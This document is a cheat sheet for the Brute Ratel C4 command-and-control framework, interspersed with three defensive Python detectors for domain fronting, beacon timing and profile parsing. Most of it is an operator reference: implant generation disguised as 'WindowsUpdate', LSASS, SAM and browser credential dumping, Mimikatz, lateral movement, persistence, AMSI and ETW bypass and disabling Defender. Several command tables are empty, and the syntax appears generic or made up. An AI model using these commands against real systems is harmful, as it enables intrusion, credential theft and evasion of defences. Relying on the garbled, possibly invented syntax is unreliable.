# Brute Ratel C4 Framework Cheat Sheet

## Overview

Brute Ratel C4 (BRc4) is a commercial, customised command-and-control (C2) framework designed for red team operations and adversary simulation. It offers advanced evasion capabilities, extensive post-exploitation functionality, and professional operational security features.

**Warning:** This is a commercial tool that requires a valid licence. It is intended only for authorised penetration tests and red team exercises. Make sure you have proper authorisation before using it in any environment.
## Installation

### License Activation

```bash
# Activate license (requires valid license key)
./brc4 --activate

# Verify license status
./brc4 --license-info

# Update license
./brc4 --update-license
```

### Server Setup

```bash
# Start BRc4 server
./brc4 --server

# Start with custom configuration
./brc4 --server --config /path/to/config.json

# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443
```

### Client Connection

```bash
# Connect to server
./brc4 --client --server 192.168.1.100:443

# Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token
```
## Command Reference

### Server Management

### Listener Management

| Command | Description |
|---------|-------------|
| `listener http` | Create HTTP listener |
| `listener https` | Create HTTPS listener |
| `listener dns` | Create DNS listener |
| `listener tcp` | Create TCP listener |
| `listener smb` | Create SMB listener |
| | Stop listener |

### Badger (Agent) Management

| Command | Description |
|---|---|
| | Interact with badger |
| | Kill badger |
| | Set sleep interval |
| | Set jitter percentage |
| | Set proxy for badger |
## Listener Configuration

### HTTP/HTTPS Listener

```bash
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start

# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
start
```

### DNS Listener

```bash
# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
start
```

### SMB Listener

```bash
# Create SMB listener
listener smb
set pipename msagent_pipe
set host 0.0.0.0
set port 445
start
```

### TCP Listener

```bash
# Create TCP listener
listener tcp
set host 0.0.0.0
set port 4444
set bind true
start
```
## Badger Generation

### Windows Badgers

```bash
# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate

# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate

# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generate
```

### Linux Badgers

```bash
# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate

# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generate
```

### macOS Badgers

```bash
# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate

# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generate
```
## Post-Exploitation Commands

### System Information

```bash
# Get system information
sysinfo

# Get current user
whoami

# Get privileges
getprivs

# Get environment variables
env

# Get network interfaces
ifconfig
```

### File Operations

```bash
# List directory
ls /path/to/directory

# Change directory
cd /path/to/directory

# Download file
download /remote/path/file.txt

# Upload file
upload /local/path/file.txt /remote/path/

# Execute file
execute /path/to/executable

# Delete file
rm /path/to/file
```

### Process Management

```bash
# List processes
ps

# Kill process
kill

# Migrate to process
migrate

# Inject into process
inject

# Create process
spawn
```

### Network Operations

```bash
# Network connections
netstat

# ARP table
arp

# Routing table
route

# Port scan
portscan 192.168.1.0/24 80,443,3389

# Ping sweep
ping 192.168.1.0/24
```
## Advanced Features

### Malleable C2 Profiles

```bash
# Load malleable profile
set malleable /path/to/profile.profile

# Custom HTTP profile
http-get {
    set uri "/api/v1/status";
    client {
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
        header "Accept" "application/json";
    }
    server {
        header "Content-Type" "application/json";
        output {
            print;
        }
    }
}
```

### Process Injection Techniques

```bash
# Classic DLL injection
inject-dll

# Process hollowing
hollow

# Reflective DLL loading
reflective-dll /path/to/dll.dll

# Manual DLL mapping
map-dll

# Thread hijacking
hijack-thread
```

### Credential Harvesting

```bash
# Dump LSASS
lsass-dump

# Mimikatz integration
mimikatz sekurlsa::logonpasswords

# SAM dump
sam-dump

# LSA secrets
lsa-secrets

# Cached credentials
cache-dump

# Browser credentials
browser-creds
```

### Lateral Movement

```bash
# WMI execution
wmi-exec 192.168.1.10 "whoami"

# PSExec
psexec 192.168.1.10 "whoami"

# SMB execution
smb-exec 192.168.1.10 "whoami"

# DCOM execution
dcom-exec 192.168.1.10 "whoami"

# WinRM execution
winrm-exec 192.168.1.10 "whoami"
```

### Persistence Mechanisms

```bash
# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"

# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily

# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"

# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"

# Startup folder
persist-startup "C:\temp\badger.exe"
```
## Evasion Techniques

### Anti-Analysis

```bash
# VM detection
vm-detect

# Sandbox evasion
sandbox-evasion

# Debugger detection
debugger-detect

# Sleep evasion
sleep-evasion 300

# User interaction check
user-interaction
```

### AMSI/ETW Bypass

```bash
# AMSI bypass
amsi-bypass

# ETW bypass
etw-bypass

# Disable Windows Defender
disable-defender

# Unhook DLLs
unhook-dlls

# Patch AMSI
patch-amsi
```

### Traffic Obfuscation

```bash
# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com

# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"

# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"
```
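The domain-fronting settings above (and the `front-domain` / `host-header` listener options earlier on this page) leave one observable trace on the wire: the TLS SNI names the CDN host while the HTTP Host header names the real destination. The following Python is an added example, not code from BRc4 or from this cheat sheet, that flags such SNI/Host mismatches in records taken from a TLS-inspecting proxy. The record format, the `_SECOND_LEVEL` heuristic and the sample pairs in `SAMPLE_RECORDS` are assumptions constructed for the example; without TLS inspection the Host header is not visible and this check cannot run.

```python
"""Flag TLS SNI / HTTP Host mismatches, the observable trace of domain fronting.
Added example; not part of BRc4 or of this cheat sheet."""

# Registrar labels under two-letter country codes, so "example.co.uk" is not split into "co.uk".
# Assumption: no public-suffix list is available offline, so this is only a heuristic.
_SECOND_LEVEL = {"co", "com", "org", "net", "gov", "ac", "edu"}


def normalise_host(name):
    """Lower-case, strip a trailing dot and any ':port' suffix."""
    return (name or "").strip().lower().rstrip(".").split(":")[0]


def registrable_domain(name):
    """Crude eTLD+1: the last two labels, or three when the second-to-last label is a
    registrar label under a two-letter country code (static.example.co.uk -> example.co.uk)."""
    labels = normalise_host(name).split(".")
    if len(labels) >= 3 and labels[-2] in _SECOND_LEVEL and len(labels[-1]) == 2:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def check_fronting(sni, host_header):
    """Compare the TLS SNI with the HTTP Host header seen after TLS inspection."""
    sni_n, host_n = normalise_host(sni), normalise_host(host_header)
    if not sni_n or not host_n:
        return {"mismatch": False, "reason": "missing SNI or Host header; cannot compare"}
    if sni_n == host_n:
        return {"mismatch": False, "reason": "exact match"}
    if registrable_domain(sni_n) == registrable_domain(host_n):
        return {"mismatch": False, "reason": "same registrable domain (CDN sub-host)"}
    return {"mismatch": True, "reason": f"SNI {sni_n!r} but Host {host_n!r}"}


# Constructed (sni, host_header) records; the first pair is the one this page configures.
SAMPLE_RECORDS = [
    ("cdn.example.com", "legitimate-site.com"),
    ("www.example.org", "www.example.org"),
    ("static.example.co.uk", "example.co.uk"),
    ("", "whatever.example.net"),
    ("cdn.cloudflare.com", "Legitimate-Site.com:443"),
]


def suspicious_pairs(records):
    """Return the (sni, host) pairs whose Host header points outside the SNI's domain."""
    return [(s, h) for s, h in records if check_fronting(s, h)["mismatch"]]


if __name__ == "__main__":
    for pair in suspicious_pairs(SAMPLE_RECORDS):
        print("possible domain fronting:", pair)
```

The same-registrable-domain rule keeps ordinary CDN traffic (an asset host under the site's own domain) out of the alert queue; records with no SNI are reported as not comparable rather than as matches.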
### Payload Obfuscation

```bash
# Encrypt payload
encrypt-payload aes256

# Obfuscate strings
obfuscate-strings

# Pack executable
pack-exe upx

# Sign executable
sign-exe /path/to/cert.pfx

# Polymorphic generation
polymorphic-gen
```
## Operational Security

### Communication Security

```bash
# Use encrypted channels
set encryption aes256

# Certificate pinning
set cert-pinning true

# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384

# Jitter configuration
set jitter 20
set jitter-type random
```
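The sleep and jitter settings (here and in the badger management commands) decide how regular the check-ins look on the wire, and that regularity is exactly what beacon-timing analytics key on. The following Python is an added example, not BRc4 code and not from this cheat sheet, that groups constructed proxy log lines by source, host and URI and scores each group's inter-request gaps. The log format, the thresholds in `find_beacons` and the jitter model in `simulate_beacon_times` (jitter shortens each sleep by up to the stated percentage, the Cobalt Strike convention; this page does not state BRc4's exact semantics) are assumptions.

```python
"""Score HTTP request timing per (source, host, uri) for beacon-like regularity.
Added example, not code from BRc4 or this cheat sheet; all log lines are constructed."""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from random import Random


def simulate_beacon_times(start, sleep_s, jitter_pct, count, seed=7):
    """Constructed check-in times for an implant with the given sleep/jitter settings.
    Assumption: jitter shortens each sleep by a random 0..jitter_pct percent."""
    rng = Random(seed)
    t, times = start, []
    for _ in range(count):
        times.append(t)
        t += timedelta(seconds=sleep_s * (1 - rng.uniform(0, jitter_pct / 100)))
    return times


def make_log_lines():
    """Constructed proxy log: '<iso-timestamp> <src> <host> <method> <uri>'."""
    start = datetime(2024, 1, 1, 9, 0, tzinfo=timezone.utc)
    lines = [f"{t.isoformat()} 10.0.0.5 cdn.example.com GET /api/status"
             for t in simulate_beacon_times(start, sleep_s=30, jitter_pct=20, count=40)]
    # Human browsing: bursts and long pauses, so gaps vary by orders of magnitude.
    t = start
    for gap in [2, 45, 1, 300, 7, 1, 900, 3, 60, 4, 1200, 5, 2, 400, 9, 30, 1, 1, 700, 12]:
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()} 10.0.0.7 news.example.net GET /index.html")
    return lines


def parse_line(line):
    ts, src, host, _method, uri = line.split()
    return datetime.fromisoformat(ts), (src, host, uri)


def find_beacons(lines, min_requests=10, max_cv=0.15, max_spread=0.35):
    """Group requests, then flag groups whose inter-request gaps are tightly clustered.
    A jitter of j% keeps every gap inside [sleep*(1-j/100), sleep], so the relative
    spread (max-min)/max stays at or below j/100 and the coefficient of variation
    stays small; human traffic has gaps spanning seconds to many minutes."""
    by_key = defaultdict(list)
    for line in lines:
        ts, key = parse_line(line)
        by_key[key].append(ts)
    results = {}
    for key, times in by_key.items():
        times.sort()
        if len(times) < min_requests:
            continue  # too few samples to say anything about periodicity
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean
        spread = (max(gaps) - min(gaps)) / max(gaps)
        results[key] = {
            "requests": len(times),
            "mean_gap_s": round(mean, 1),
            "cv": round(cv, 3),
            "spread": round(spread, 3),
            "beacon_like": cv <= max_cv and spread <= max_spread,
        }
    return results


if __name__ == "__main__":
    for key, score in find_beacons(make_log_lines()).items():
        print(key, score)
```

On the constructed data the `/api/status` group scores a coefficient of variation well under 0.1 with spread at most 0.2, while the browsing group is nowhere near either threshold; on real traffic the thresholds need tuning against known-good periodic clients such as update checkers, which also beacon.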
### Infrastructure Management

```bash
# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443

# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"

# Failover configuration
set failover-servers "backup1.com,backup2.com"
```

### Logging and Monitoring

```bash
# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log

# Operator tracking
set operator-logging true

# Command auditing
set command-audit true

# Session recording
set session-recording true
```
## Team Operations

### Multi-Operator Support

```bash
# Add operator
operator add username password

# Set operator permissions
operator permissions username read,write,execute

# Operator sessions
operator sessions

# Kick operator
operator kick username
```

### Collaboration Features

```bash
# Share badger session
share-session

# Session notes
note-add "Important finding"
note-list
note-delete

# Team chat
chat "Message to team"
chat-history
```
## Troubleshooting

### Connection Issues

```bash
# Test listener
test-listener

# Check connectivity
test-connectivity

# Verify certificates
verify-cert /path/to/cert.pem

# Debug mode
set debug true
```

### Badger Issues

```bash
# Badger health check
health-check

# Reset badger
reset-badger

# Badger diagnostics
diagnostics

# Force reconnect
reconnect
```

### Performance Optimization

```bash
# Optimize sleep intervals
set sleep-optimization true

# Bandwidth throttling
set bandwidth-limit 1024

# Connection pooling
set connection-pooling true

# Compression
set compression gzip
```
## Configuration

### Server Configuration

```json
{
  "server": {
    "host": "0.0.0.0",
    "port": 443,
    "ssl": true,
    "cert": "/path/to/cert.pem",
    "key": "/path/to/key.pem"
  },
  "database": {
    "type": "sqlite",
    "path": "/opt/brc4/database.db"
  },
  "logging": {
    "level": "info",
    "file": "/var/log/brc4.log"
  }
}
```
### Malleable Profile

```c
// Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";

http-get {
    set uri "/api/status";
    client {
        header "Accept" "application/json";
        header "Accept-Language" "en-US,en;q=0.9";
    }
    server {
        header "Content-Type" "application/json";
        output {
            print;
        }
    }
}
```
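Both the fragment under Malleable C2 Profiles and the full profile above use the same `set` / `header` / brace-block syntax, and the network fields in it (URI, User-Agent, headers, sleep and jitter) are what a detection engineer pulls out of a captured profile to write proxy or IDS rules. The following Python is an added example, not BRc4 code and not from this cheat sheet: a small tokenizer and recursive-descent parser for that syntax plus an indicator extractor. `SAMPLE_PROFILE` is constructed from the fragments on this page, and the check-in interval band assumes jitter shortens the sleep by up to the stated percentage (the Cobalt Strike convention), which this page does not state for BRc4.

```python
"""Parse the Malleable C2 profile syntax shown on this page and pull out network indicators.
Added example, not BRc4 code; SAMPLE_PROFILE is constructed from the page's fragments."""
import re

SAMPLE_PROFILE = '''
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
http-get {
    set uri "/api/status";
    client {
        header "Accept" "application/json";
        header "Accept-Language" "en-US,en;q=0.9";
    }
    server {
        header "Content-Type" "application/json";
        output { print; }
    }
}
'''

# One token per match: a double-quoted string, a brace or semicolon, or a bare word.
_TOKEN = re.compile(r'\s*(?:"((?:[^"\\]|\\.)*)"|([{};])|([^\s{};"]+))')


def tokenize(text):
    tokens, pos = [], 0
    while pos < len(text):
        m = _TOKEN.match(text, pos)
        if m is None:  # trailing whitespace, or an unterminated quote
            if text[pos:].strip():
                raise ValueError(f"unexpected input at offset {pos}: {text[pos:pos + 20]!r}")
            break
        pos = m.end()
        if m.group(1) is not None:
            tokens.append(("str", m.group(1).replace('\\"', '"')))
        elif m.group(2) is not None:
            tokens.append(("punct", m.group(2)))
        else:
            tokens.append(("word", m.group(3)))
    return tokens


def _parse_block(tokens, i, depth):
    """Parse statements until this block's closing '}' (or end of input at depth 0)."""
    node = {"set": {}, "header": [], "flags": [], "blocks": {}}
    while i < len(tokens):
        kind, val = tokens[i]
        if kind == "punct" and val == "}":
            if depth == 0:
                raise ValueError("unbalanced '}'")
            return node, i + 1
        if kind != "word":
            raise ValueError(f"expected a keyword, got {val!r}")
        j, args = i + 1, []
        while j < len(tokens) and tokens[j][0] != "punct":  # arguments up to ';' or '{'
            args.append(tokens[j][1])
            j += 1
        if j >= len(tokens):
            raise ValueError(f"unterminated statement {val!r}")
        if tokens[j][1] == "{":
            child, j = _parse_block(tokens, j + 1, depth + 1)
            node["blocks"][" ".join([val, *args])] = child
        elif tokens[j][1] == ";":
            j += 1
            if val == "set" and len(args) == 2:
                node["set"][args[0]] = args[1]
            elif val == "header" and len(args) == 2:
                node["header"].append((args[0], args[1]))
            else:  # bare directives such as "print;" inside output {}
                node["flags"].append((val, tuple(args)))
        else:
            raise ValueError(f"unexpected '}}' after {val!r}")
        i = j
    if depth > 0:
        raise ValueError("missing '}'")
    return node, i


def parse_profile(text):
    return _parse_block(tokenize(text), 0, 0)[0]


def extract_indicators(profile):
    """Fields that map directly onto proxy/IDS rules, plus the expected check-in band.
    Assumption: jitter shortens the sleep by up to the stated percentage."""
    get = profile["blocks"].get("http-get", {"set": {}, "blocks": {}})
    client = get["blocks"].get("client", {"header": []})
    sleep_ms = int(profile["set"].get("sleeptime", "0"))
    jitter = int(profile["set"].get("jitter", "0"))
    return {
        "user_agent": profile["set"].get("useragent"),
        "get_uri": get["set"].get("uri"),
        "client_headers": dict(client["header"]),
        "sleep_ms": sleep_ms,
        "jitter_pct": jitter,
        "min_interval_ms": sleep_ms * (100 - jitter) // 100,
        "max_interval_ms": sleep_ms,
    }
```

Running `extract_indicators(parse_profile(SAMPLE_PROFILE))` yields the `/api/status` URI, the spoofed User-Agent, the client headers and a 24000 to 30000 ms check-in band; a profile with a missing or stray brace is rejected with a `ValueError` rather than silently producing partial indicators.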
## Resources

- Brute Ratel C4 Official Website
- BRc4 Documentation
- Red Team Operations Guide
- Malleable C2 Profiles

---

*This cheat sheet provides a comprehensive reference for using Brute Ratel C4. It is a commercial tool that requires proper licensing. Always make sure you have proper authorisation before using this tool in any environment.*